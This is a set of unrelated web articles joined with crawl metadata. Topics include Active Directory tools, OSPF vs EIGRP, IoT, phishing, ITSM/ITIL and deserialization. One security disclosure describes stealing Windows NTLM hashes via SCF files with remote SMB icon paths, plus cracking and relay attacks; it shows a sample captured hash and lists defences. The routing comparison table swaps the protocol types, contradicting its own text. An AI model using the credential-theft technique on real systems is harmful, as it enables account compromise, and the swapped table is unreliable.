ManageEngine has a wide variety of network monitoring solutions, one of the best of which is its full-service Active Directory management tool. IT teams can use AD Manager Plus to extend Active Directory into G Suite, Office 365, Microsoft Exchange, Skype, and their own internal network access rights.
The tool is neatly organized: it operates from a single dashboard, on which IT admins can easily view and monitor all Active Directory objects and groups, and provision users. In addition, I like AD Manager Plus for its robust reporting system. You can easily generate Active Directory reports on either a scheduled or ad hoc basis, and the tool comes with more than 150 preconfigured report templates, which goes a long way when you’re working to stay in compliance with industry regulators. ManageEngine can also generate specific reports for Active Directory users, logons, computers, passwords, and other objects.
AD Manager Plus comes with more of a learning curve than the other tools. Its user interface isn’t the most intuitive, especially when operating on mobile, and the lack of documentation makes it hard to deal with little bugs here and there. Users may also have a tough time tracking down a support team member to assist with more complicated inquiries. | <urn:uuid:eaad16fe-10ed-43b3-bf9d-f7ca7336ab48> | CC-MAIN-2022-40 | https://www.dnsstuff.com/active-directory-forest | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00762.warc.gz | en | 0.917547 | 3,830 | 2.5625 | 3 |
Open Shortest Path First (OSPF) and Enhanced Interior Gateway Protocol (EIGRP) are two of the most popular Internal Gateway Protocols (IGPs) employed in today’s modern IP networks.
Both are mature protocols, having been around for decades, and are extremely reliable, flexible, and highly configurable. And yet, they are surprisingly dissimilar in their architecture, implementation, and design.
In this article we’ll discuss and compare OSPF vs EIGRP routing protocols, but first let’s see a quick comparison table of the two:
Comparison Table of OSPF vs EIGRP
The following table compares some of the most important characteristics of these two protocols:
|1||Type||Distance vector||Advanced link-state|
|2||Open standard?||Yes, since inception||Began as proprietary but has become an open standard as of 2013|
|3||Routing algorithm||Dijkstra’s Algorithm||Diffusing Update Algorithm (DUAL)|
|4||Topology||Each router maintains a network topology within the OSPF database of the area in which it resides||Each router maintains a topology table that contains the routes it has learned about via EIGRP|
|5||Areas||Uses areas to break down larger topologies into manageable segments||Does not use areas|
|6||Scalability||Extremely scalable due to area architecture and multiple LSA types||Extremely scalable due to incremental updates and storing of partial topologies|
|7||Resource usage (CPU, memory, and network throughput)||Low usage due to multiple LSA types and area architecture||Lowers usage due to incremental updates, and implementation of feasible successor|
|8||Support for IPv4 and IPv6||Yes, in OSPFv3||Yes|
|9||Convergence speed||Fast||Extremely fast|
|10||Default administrative distance (AD)||110||90|
Now let’s take a closer look at each one.
OSPF was first conceived in the 1980s and was officially released in 1989 in RFC 1131. It is a non-proprietary protocol, meaning it can be freely implemented by the equipment of any vendor, and it is what is known as a link-state routing protocol.
An OSPF router will gather link state information from neighboring OSPF routers and will create and maintain a topology of the whole network within its memory.
This is maintained within a data structure known as the OSPF database. In a converged network, all OSPF routers will have constructed an identical copy of the network topology in their memories. This is the main construct via which OSPF operates.
One of the major differences between OSPF and EIGRP is the fact that OSPF uses a concept of areas. An area in OSPF is simply a logical grouping of routers.
Each OSPF area maintains a separate OSPF database. OSPF routers can either exist wholly within an area, or they can have interfaces within two or more areas, making them border routers. Take a look at the following diagram which illustrates this:
In this case, R1 has one interface in Area 0 and one in Area 1. R1 is thus considered an Area Border Router or ABR. ABRs maintain a separate OSPF database for every area that they are connected to.
There are some restrictions as to how areas can be created, and these include:
- An OSPF topology must always have an Area 0. This is also called the backbone area.
- All non-backbone areas must be directly connected to Area 0. In other words, any ABR within a non-backbone area must also have a connection to Area 0.
With the introduction of areas, OSPF database contents are limited to the routes found within each area. A router in Area 0 doesn’t need to have information about the network topology in Area 1, for example.
It is this very characteristic, that of segmenting an OSPF topology into smaller more manageable areas, that makes OSPF extremely scalable.
Link State Advertisements
OSPF’s routing updates are called Link State Advertisements (LSAs). These are messages exchanged between OSPF routers to share information about their local routing topologies.
Because of the scalability introduced with the use of OSPF areas, not all LSAs are flooded out of all interfaces of an OSPF router.
There are various types of LSAs, each one limited to being shared with specific OSPF neighbors. In this way, detailed OSPF information is kept localized, ensuring that any routing information not useful for particular routers is not shared, while summary information about routes is flooded to the whole topology. This ensures the minimization of the use of system resources on OSPF routers.
Unlike OSPF, EIGRP began as a proprietary routing protocol developed by Cisco. It is the enhanced version of its original IGRP protocol and was introduced in 1993.
It is known as an advanced distance-vector routing protocol. EIGRP does not maintain a database containing the full network topology, but only shares information about the routes in its routing table.
When sending updates to its neighbors, an EIGRP router doesn’t share the entirety of its routing information, but sends incremental updates, vastly reducing network bandwidth usage as well as processing and memory resources on each router.
EIGRP uses the following data constructs in addition to the routing table, to achieve its operation:
Neighbor table – This is a record of the IP addresses of neighboring routers, those that have a direct physical connection to the local router. Only routers with IP addresses in the same subnet as an interface of the local router are considered neighbors.
Topology table – This construct stores routes that the router has learned from its neighbors. It only stores EIGRP-learned routes but makes a record of all possible routes to a particular destination. It is only the best route in the topology table that makes it into the routing table.
Successors and Feasible Successors
As mentioned before, within the topology table, all of the possible routes to a particular destination are recorded.
This means that there may be two, three, four, or more paths that can be taken to reach a particular destination, and all of them are maintained there. The best route, which is placed in the routing table is called the successor. The second-best route is called the feasible successor.
This is an important concept because EIGRP has a trick up its sleeve. It is always ready to immediately (within several milliseconds) replace the successor with the feasible successor in the event of a failure without the need to rerun the EIGRP routing algorithm, which may take substantially longer depending upon the size of the topology. This makes EIGRP lightning fast in the event of a failure of a route.
In order to become a feasible successor, this second-best route must fulfill what is known as the feasibility condition, but that’s a topic for another article.
We can come to some conclusions about these protocols based on the above information:
- OSPF is generally preferred due to its open architecture
- EIGRP is generally preferred due to its slightly better handling of resources, especially for large networks. This is reflected in its slightly lower AD
- There is no solid evidence for which protocol is more scalable (i.e. which can support a larger network size) as both, under varying circumstances, perform similarly. However:
- EIGRP is better in environments where there are more routes to share among fewer routers
- OSPF is better in environments where there are fewer routes to share among more routers
Links to relevant standards:
- OSPFv2 RFC2328
- OSPFv3 RFC5340 (includes support for IPv6)
- EIGRP RFC7868 (published when it became an open standard) | <urn:uuid:c2868e3c-3b70-48a0-8a2a-ea5063fcfd15> | CC-MAIN-2022-40 | https://www.networkstraining.com/ospf-vs-eigrp-routing-protocols/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00762.warc.gz | en | 0.938597 | 1,717 | 3.03125 | 3 |
Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015.
However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.
With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?
Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like:
As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files.
SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example:
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “.
The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 22.214.171.124:62521 - 126.96.36.199
USER:Bosko DOMAIN:Master OS: LM:
NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000
The above example shows a disclosure of victim’s username, domain and NTLMv2 password hash.
It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.
For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse.
For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA.
Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy.
The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”).
SMB relay attacks
Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference.
Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim’s network and essentially get an internal access to the network.
Antivirus Handling of SCF
Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations.
Introducing new attack vectors
Although using social engineering to entice the victim to visit the attacker’s website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact.
Reflected file download
First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user’s browser when the certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user’s trust in the vulnerable domain.
Since SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD.
RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most of typical API response content types directly so these would have to be forced through a download attribute in a href=… link tags. However, there are exceptions. Chrome uses MIME-sniffing with text/plain content type and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set.
This can be demonstrated on World Bank API, using the following URL:
Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes.
In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files.
As SCF files still pose a threat the measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks.
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.
We hope that the Google Chrome browser will be updated to address this flaw in the near future.
Bosko Stankovic is a Senior Security Engineer at DefenseCode, a provider of static and dynamic application security testing.
In February 2022, WhiteSource acquired DefenseCode. | <urn:uuid:00e09d53-6143-44d3-843f-6f505f2e29c1> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2017/05/15/stealing-windows-credentials-using-google-chrome/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00762.warc.gz | en | 0.903062 | 2,361 | 2.515625 | 3 |
The Internet of Things (IoT) allows devices to send data to cloud storage, where it can be combined with other data, analysed and interpreted using techniques such as predictive analytics, artificial intelligence and deep learning. The resulting knowledge, including identification of patterns and trends, reveals new insights that have the potential to touch every aspect of our lives. Many of us are already using IoT devices in our homes, from smart sensors to voice activated virtual assistants.
However, I believe that to achieve the IoT’s full potential we must add visual data to create the Visual IoT (VIoT). Sight is the most important of our senses, so integrating visual information with other IoT data streams is immensely powerful. It helps a system or device better understand and interpret objects and movement as well as its surroundings based on the visual data it can ‘see’.
We now have the processing power, bandwidth, data storage capacity and computing ability to enable fast, reliable analysis of visual data to a standard that makes it commercially viable. The result, according to McKinsey, is that video analytics will see a compound annual growth rate of more than 50 percent over the next five years, contributing to a potential economic impact for the IoT of $3.9 trillion to $11.1 trillion a year by 2025.
Doing this does not require hundreds of new cameras. Huge volumes of visual data already exist, collected by the analogue and digital cameras that surround us, from traffic and numberplate recognition cameras to CCTV systems. Most of this visual data, however, is currently collected for a single purpose, and only a tiny percentage is ever viewed. Combining it with other IoT data streams and adding analytics would make it immensely valuable.
Our research suggests there are currently some 8.2 million surveillance cameras in the UK, producing 10.3 petabytes2 of visual data every hour. Consolidating this in a cloud infrastructure and combining it with other data sets, from static data such as grid references to dynamic ones such as weather data, could provide clear visual insight into what is happening, why, and what might happen next. Applications could range from speeding up the response to motorway accidents and managing city centre parking to working with people flows in transport hubs and caring for vulnerable people.
We are already seeing companies such as Vodafone integrating cloud-based CCTV with building security systems, adding visual verification to intruder alarms. Such systems can enable home security companies and the police to check properties visually when an alarm goes off and quickly ascertain whether a break-in has occurred. This can provide significant time and cost savings while enabling immediate action to be taken if appropriate.
Cameras combined with analytics can be configured to map patterns of movement in real time, helping to understand the number and flow of people in public spaces such as stations, airport terminals, tourist attractions and shopping malls. This could be used to automate the management of people flow systems, for example changing the direction of escalators and lifts as customer behaviour patterns change during the day. In many cases cameras can be used simply as a sensor with analytics to verify something, for example that the object at the barrier is a red van with a particular numberplate, and take action, such as lifting the barrier, without necessarily recording the image.
Another application is city centre parking. According to the British Parking Association, 30 percent of city centre drivers are simply looking for a parking space. Cameras could monitor roadside parking spots, letting a central system know which are unoccupied. Location data could be shared with a driver’s routing app, with visual data made accessible so they know what they are looking for. It should even be possible for the driver to book a space and authorise payment to be made automatically, with length of stay calculated and payment taken when they leave.
Another exciting possibility is to speed up the response to road traffic accidents. The VIoT offers the possibility of combining data from motorway cameras to help pinpoint the precise location of accidents and to tell first responders in real time about any hold-ups when they are en route. This information could be combined with in-vehicle routing systems to ensure their swift arrival.
Applying analytics to visual data will lead to further applications by revealing patterns and predicting future behaviours. This intelligence will help organisations optimise systems, improve safety and make better, faster, more appropriate decisions. The good news is that machines are doing the ‘watching’ – not people.
Analytics combined with AI and IoT can also play a key role in helping protect more vulnerable members of society. We are already seeing cameras used in care situations to detect pre self-harming or suicidal behaviours, and to monitor individuals to ensure they are being well treated (with appropriate permissions). In the future older people living in their own homes could benefit from cameras which record where and when they are active. Periods of inactivity might indicate a problem and could trigger alerts to family or carers. Cameras at stations could be trained using AI to spot behaviours indicative of potential suicides and issue appropriate alerts to staff.
The big issue is of course privacy, but the right analytical software enables automatic decisions to be made without human involvement, while the General Data Protection Regulation (GDPR) provides additional data protection. There are also many applications in sectors such as the environment that will not involve individuals at all.
James Wickes is cofounder and chief executive at Cloudview
Further information is available in the White Paper VISUAL IoT: WHERE THE IoT, CLOUD AND BIG DATA COME TOGETHER. | <urn:uuid:9eacbaac-6a87-45b4-b4fd-a28705dbd725> | CC-MAIN-2022-40 | https://www.b2e-media.com/creating-the-visual-iot | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00762.warc.gz | en | 0.94107 | 1,128 | 2.625 | 3 |
The internet of things (IoT) has been constantly expanding to encompass an increasing number of connected objects such as smart refrigerators, virtual assistants built into speakers, and driverless cars. IoT has been impacting businesses in unprecedented ways by increasing the productivity of operations. According to Gartner, the number of connected things will reach 20.4 billion by 2020.
Vulnerabilities in IoT
“Once IoT devices are distributed without proper security in place, it can be a problem. People have to think of security as an intrinsic part of the IoT development cycle.”
Country Head, FireEye India
At the same time, the ubiquity of these devices has caused a surge in security threats due to a large attack surface. Attackers have exploited IoT devices with vulnerabilities to steal data and use them as remote bots to carry out distributed attacks. A famous example is the Mirai, a malware that attacked IoT devices running Linux, to form a botnet DDoS attack. Yet another example is the case of implantable medical devices like pacemakers which were found vulnerable to cyber-attacks. Although operational technology (OT) systems are generally considered safer when compared to IT. The ever-increasing convergence of physical and digital objects under the IoT umbrella is raising security concerns for industries that have been using closed OT systems for a long time. The question is whether security is merely an afterthought in the design process of IoT devices. A 2015 study by HPE revealed that up to 70 percent of IoT devices are vulnerable to attacks due to vulnerability flaws in their software, and used unencrypted software to transmit information. Security as an intrinsic part of the IoT
“Cybersecurity in the IT world and OT world are two different things, and in the IT world, security can be an afterthought. For example, you can buy a PC from an open market and later on you can decide to put the security software to protect your device. Therefore, at the manufacturing stage itself, you should take care of the security itself. Once, they are distributed without proper security in place, it can be a problem. People have to think of security as an intrinsic part of the development cycle than post, which has been a classical case,” says Shrikant Shitole, senior director and country head, FireEye India.
“IoT is going to be the next biggest challenge for the companies…. So, it is required that there is a good amount of planning within the corporates by clearly articulating how they are going to manage security”
Cybersecurity leader, PwC India
Many organizations are in the dark about the exact number of unsecured devices which are connected to their networks, cyber-security experts warn. According to them, to solve the cybersecurity crisis in the IoT era, an organization must take an in-depth approach, involving multiple layers of security throughout the enterprise network and having clear visibility and monitoring of all connected devices. “When it comes to IoT, it is very important to have the assessment of the situation. For example, when you are rolling out an app with an IoT device communicating back to your servers. So, you have to look at it holistically because you do not know what loopholes you have left. Once you understand the assessment, then you can start plugging the security holes which includes reloading patches on the operating system, applications or any communication channel which is left open. There is always a risk of a breach; but more important is that you put all mechanisms in place from protection as well as detection perspective,” says Shitole.Cybersecurity approach for IoT
According to cybersecurity experts, security by design has to be a priority in IoT devices. Not only is the design of IoT infrastructure critical, but it must also include regular patch updating and continuous monitoring of IoT devices. The experts say that in order to tackle the challenges posed by IoT vulnerabilities, original equipment manufacturers (OEMs) and IT professionals should collaborate on a well-defined security strategy and understand IoT vulnerabilities from the perspective of attackers.“IoT is going to be the next biggest challenge for the companies. While it gives a lot of advantage, it also brings in unmanageability because you have a huge number of devices on it. Generally, we see that security is an afterthought and is not limited to IoT only. So, it is required that there is a good amount of planning within the corporates by clearly articulating how they are going to manage security,” says Sivarama Krishnan, cybersecurity leader at PwC India. | <urn:uuid:76282f21-e824-4887-bcb1-1a5c88b4cc4d> | CC-MAIN-2022-40 | https://www.cio.com/article/218048/is-cyber-security-an-afterthought-in-the-iot-infrastructure.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00762.warc.gz | en | 0.964239 | 945 | 2.859375 | 3 |
Throughout modern history, technological innovation has been a catalyst for change, as emergent technologies have transformed our day-to-day lives. Technology has dramatically reshaped modern society and paved the way for amazing tools, multi-functional devices like the smartwatch and the smartphone. Computers are increasingly faster, more portable, and higher-powered than ever before.
With all of these revolutions, technology has also made our lives easier, faster and granted access to any product or service – from shopping at your favourite retailer to booking a doctor’s appointment – technology has granted us boundless access to resources, putting information at our fingertips.
The modern consumer experience reflects this, as technology continues to alter how we use services and products on a regular basis. Technology now enables business and consumers to interact remotely – but what ensures that this occurs in an effective and efficient manner?
Technology increases transparency allowing consumers to properly evaluate the brands they do business with.
Consumers are increasingly concerned with the social purpose and ethics of brands, meaning that people want to know more about the companies that they’re choosing to economically transact with. With the help of modern technology, consumers are able to do more research than ever before choosing who they should be engaging with. The internet makes it so easy for consumers to find information that decades ago, might have been able to remain hidden.
Now businesses are put under the microscope, they’re expected to be responsible in all of their decision making and how they conduct their business, down to where they distribute and purchase their products as well as services from.
Businesses can make the most of this consumer trend, by increasing transparency through their website and social media channels. In fact, transparency has become so appealing to consumers that businesses large and small are using it now to market their products. Sole traders can build huge social media followings by demonstrating their ethical business processes as customers become invested in the brand, as a result. Large corporations can do the same, sharing information about their product sourcing, their investors and so on.
- Remote working leading to more data breaches (opens in new tab)
Tech enables businesses and employees to use their time more efficiently.
There’s a whole world of reasons that businesses and employees need, and are, incorporating remote work setups into their organisations: better work / life balance makes for a happier, more efficient workforce; families often need to manage care arrangements for children and older family members better; disabled employees may find it difficult and stress enduring to use public transport, particularly during peak times. This often helps to generate a more inclusive working environment, generating benefits for both employees and employers alike.
There is a much greater awareness of the importance of being green and clear recognition that adopting sustainability as a working practice by businesses is no longer optional. Technology is making travelling to the office everyday unnecessary, as internet access allows employees to work from wherever they are, at a time that suits them. This often leads to happier employees and increased output. For us, tech platforms like Slack are exceptionally useful as we have employees that reside in both Europe and North America where the time difference is around 8 hours. Slack lets companies like ContactLenses.co.uk to overcome geographic remoteness, allowing employees to be in constant communication more connected than ever before.
Technology enables consumers to access products at lightening pace.
As access to greater information grows, consumers are demanding from retailers. When consumers see a product they like from the other side of the world on social media, they can source it, and have it shipped to them in less than a few weeks. International Fashion Weeks are streamed live – there’s no more waiting for the September issue of Vogue to find out the trends – and within a matter of days, copycat items are available, especially when online sellers are using suppliers to DropShip orders from suppliers overseas. With regards to our priorities we place fast shipping high on the list as we use tech to us ensure our consumers receive their contact lenses as quick as possible.
- Factors that drive remote work forward (opens in new tab)
Technology streamlines and facilitates round the clock customer service
With the rise of eCommerce, consumer expect a high level of convenience to come at all stages of the shopping process. When a customer has a problem with an order, or a question about a product, they’re less likely to pick up the phone today than they were in the past. Email support is generally great and allows customers to access help when they have time – as long as the business replies in good time. It was a great solution until chatbots came along – which made email look old-fashioned. Chatbots are simply programs that make customer service more efficient by asking a set of questions, before passing to a real-life person if necessary. Customers can converse with chatbots on company websites to get their answer quicker and are happy when their issue is resolved. Happy customers make for great reviews demonstrating better business practices. We love providing our users with an effective chatbot and we can honestly say our customers are a big fan of them too.
Technology has ushered in the dawn of the connected world, as people across the planet are able to network in ways thought unimaginable a hundred years ago. This remote connectivity has reshaped the relationship between businesses and consumers, triggering changes and generating brand new channels for interacts to occur within. It is easy to imagine that soon there will be a number of new concepts to add to the above list; the ways in which tech is enabling businesses and consumer to do things remotely are ever evolving.
- Employees everywhere call for more remote working (opens in new tab)
John Dreyer, Optometric Consultant, Contactlenses (opens in new tab) | <urn:uuid:ea10b8fe-a8f5-46be-ab61-c47e983316ce> | CC-MAIN-2022-40 | https://www.itproportal.com/features/how-tech-is-enabling-businesses-and-consumers-to-do-things-remotely/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00162.warc.gz | en | 0.959155 | 1,166 | 3.015625 | 3 |
Since the COVID-19 pandemic heavily shifted work patterns for millions of people around the world, one of the biggest changes, particularly among white collar workers, has been a move towards working from home wherever possible. As a result, millions of employees are accessing sensitive corporate networks from outside secure office settings. Naturally enough, this creates a wonderful landscape of opportunities for cyber attacks–especially through email phishing.
How Phishing Threats Evolved Since 2020
Phishing is defined as an attempt to dishonestly obtain sensitive information–such as banking details and login credentials. It is typically from someone impersonating a trusted entity through digital communications. Just like any aspect of IT and digital media, phishing attempts evolve as well. Between 2020 and 2021, they’ve done so in two crucial ways:
First of all, a phishing attack is most commonly done through the more formal landscape of email communications. But attackers have effectively adapted their tactics to include other platforms like social media, messaging apps and even phone calls. As long as the underlying aim of tricking someone into handing sensitive information over to a source pretending to be legitimate is achieved, all of these digital mediums are fair game.
Secondly, the use of all these mediums–especially email–has evolved dramatically to revolve around the COVID-19 pandemic. The general atmosphere of frequent legal or political uncertainties, shifting corporate remote policies and turbulent news cycles about pandemic regulations have all caused a flood of genuine official communications related to the situation. Each of these has been an opportunity for cyber criminals to imitate authentic looking messages for their own data fraud attempts. Examples abound, including spoofed tax emails about COVID deductions, vaccine sign-ups from emails pretending to be health authorities or even messages imitating logistics companies about new payment fees or policies.
At-home employees are already stressed by their existing changes in work and life routine. Therefore, they can be especially vulnerable to these kinds of phishing attempts since they lack access to a nearby colleague who can help them discern real from false.
Best Practices for Cutting Phishing Lines
Despite the above, phishing threats can be neutralized. Companies themselves can offer information sessions with their staff about the dangers of phishing and how it has evolved in the last year.
Other fairly economical data security countermeasures could include requesting that employees only share sensitive information or log into their work accounts through closed VPN services or with work-specific devices. Adding the use of multi-factor authentication to any devices or accounts is another robust step that many companies can implement.
Businesses can and should take a layered approach to their company’s security, with widespread email authentication and careful monitoring of communication endpoints.
Getting Help from Trained IT Professionals
Companies, such as Great Lakes Computer Corporation, are staffed by trained professionals who know how to deliver effective, strong managed IT services. Services by Gateway, such as their email security solutions, combine professional expertise with powerful AI monitoring technology to help eliminate phishing techniques such as social engineering attempts and impersonation attacks via carefully disguised false email messages. Contact us and we can help protect your business and your employees easily. | <urn:uuid:98f54821-9ad4-43d3-a3d1-83988858afa3> | CC-MAIN-2022-40 | https://greatlakescomputer.com/blog/phishing-email-attacks-on-the-rise | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00162.warc.gz | en | 0.944673 | 638 | 2.75 | 3 |
IT Service Management is referred to by the acronyms “ITIL” and “ITSM” by a large number of IT experts. The terms ITIL and ITSM are also often used interchangeably in the information technology industry. Do they all have the same meaning?
No, there is a distinction; hence the answer is no.
ITIL (Information Technology Infrastructure Library) and ITSM (Information Technology Service Management) are two distinct approaches to IT service management (IT Service Management). Because ITIL and ITSM are ever-evolving, it’s essential to stay on top of the newest developments.
Simply said, it’s an ITSM practice or professional discipline, whereas ITIL is an organization of best practices that provides advice for ITSM. But that’s only the beginning. By studying the history of IT companies and how IT has grown through time, we can learn a lot about the distinctions between the two.
What is ITSM (IT Service Management)?
According to TechTarget “IT service management (ITSM) is a general term that describes a strategic approach to design, deliver, manage and improve the way businesses use information technology (IT)”
That is correct but there’s a misconception that ITSM is a software solution. In truth, ITSM is a combination of people, processes, and technology. An ITSM solution includes software as a component.
ITSM is a strategic approach to the design, delivery, management, and improvement of the way information technology (IT) is utilized inside a company. ITSM stands for IT Service Management. For a company to be successful, IT Service Management must guarantee that the correct technology and people are employed. Read more about ITSM.
What is ITIL (IT Infrastructure Library)?
The IT Infrastructure Library (ITIL) is a set of papers that serve as a basis and best practices for developing an ITSM solution. ITIL stands for Information Technology Infrastructure Library. If enterprises that support an IT infrastructure adhere to ITIL best practices, they may be able to increase productivity while also lowering service management costs. Read more about ITIL.
The relationship between ITIL and ITSM
The terms ITSM and ITIL are used to refer to each other in a symbolic way. ITIL encompasses all of the elements in the ITSM definition. ITSM is the method through which IT oversees the supply of services to business customers, whereas ITIL is the method by which IT gives guidelines on how to operate efficiently.
The differences between ITSM and ITIL
- ITSM refers to an entire organizational implementation, whereas ITIL refers to a collection of process standards that guide the supply and support of information technology services (IT services).
- ITSM refers to a collection of procedures that are used to manage the services that are given to end-users, whereas ITIL refers to the best practice framework for information technology service management. It contributes to the provision of the required tools and strategies for providing those services in an effective manner.
- ITIL is micro-focused on IT within the organization, whereas ITSM is macro-focused on the business.
- ITSM defines the “what,” whereas ITIL describes the “how.” ITSM and ITIL are two different concepts.
- ITIL is one of several frameworks that teach best practices for implementing information technology service management (ITSM), while ITSM is a combination of the use of that framework aligned with the various business perspectives to deliver quality information technology services.
Because ITIL is the most widely used method to ITSM, it is frequently misunderstood. ITSM and ITIL are not mutually exclusive but rather are complementary to one another in their approach. In information technology, service management (ITSM) is a collection of practices, rules, and procedures that assist in the management of services offered to end-users. ITIL is a framework that teaches organizations how to adopt ITSM best practices. To conclude, ITIL is a set of recommendations for effective information technology service management.
Start your trial with Alloy Software today | <urn:uuid:88843797-a51d-4c38-8afc-946bc271f546> | CC-MAIN-2022-40 | https://www.alloysoftware.com/resources/itsm-itil-whats-difference/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00162.warc.gz | en | 0.934847 | 844 | 2.609375 | 3 |
Insecure Deserialization is a class of vulnerability that affects a wide range of software. Being included as the number 8 spot on the OWASP Top 10 (2017), it’s a common issue to run into. In this article I’d like to cover the following topics:
The primary focus of this article is to introduce the concept of Python 2/3 deserialization attacks. I intend to write a part 2 focusing more on PHP.
If you’d like to follow along or see some examples, please see this GitHub repo which contains all the code I’ve used here along with explanations.
